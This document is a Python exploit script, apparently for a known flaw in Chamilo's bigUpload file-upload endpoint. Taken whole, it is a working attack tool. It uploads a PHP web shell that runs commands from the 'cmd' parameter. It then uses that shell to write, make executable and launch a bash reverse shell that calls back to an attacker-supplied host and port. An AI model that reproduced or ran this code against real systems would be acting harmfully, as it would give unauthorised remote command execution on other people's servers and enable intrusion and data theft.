exploit.py

import requests
from typing import Union


class ChamiloBigUploadExploit:
    def __init__(self, url: str) -> None:
        self.root_url = url
        self.check_url = f'{self.root_url}/main/inc/lib/javascript/bigupload/files/'
        self.vunerable_endpoint = f'{self.root_url}/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'


    @staticmethod
    def urlencode_all_characters(string):
        return ''.join('%{0:0>2x}'.format(ord(char)) for char in string)


    def check_target_vulnerable(self) -> bool:
        response = requests.get(self.check_url)

        if response.status_code == 200:
            return True
        else:
            return False
        
    
    def send_webshell(self, filename: str) -> Union[str, bool]:
        webshell_content = '<?php echo system($_GET["cmd"])?>'

        response = requests.post(
            self.vunerable_endpoint,
            files={
                'bigUploadFile': (filename, webshell_content)
            }
        )

        if response.status_code == 200 and response.text == 'The file has successfully been uploaded.':
            return f'{self.check_url}{filename}'
        else:
            return False


    def send_and_execute_revshell(self, webshell_filename: str, bash_revshell_filename: str, host: str, port: int) -> bool:
        bash_revshell_content = f'#!/bin/bash\nbash -i >& /dev/tcp/{host}/{port} 0>&1'

        self.send_webshell(webshell_filename)

        urlencoded_create_bash_revshell_command = self.urlencode_all_characters(f'echo -n "{bash_revshell_content}" > {bash_revshell_filename}')
        urlencoded_grant_exec_permission_revshell_command = self.urlencode_all_characters(f'chmod +x {bash_revshell_filename}')
        urlencoded_execute_revshell_command = self.urlencode_all_characters(f'bash {bash_revshell_filename}')

        commands = [urlencoded_create_bash_revshell_command, urlencoded_grant_exec_permission_revshell_command, urlencoded_execute_revshell_command]

        for command in commands:
            try:
                response = requests.get(f'{self.check_url}{webshell_filename}?cmd={command}', timeout=5)

                if response.status_code == 200:
                    continue
                else:
                    return False
            except requests.exceptions.ReadTimeout:
                pass

        return True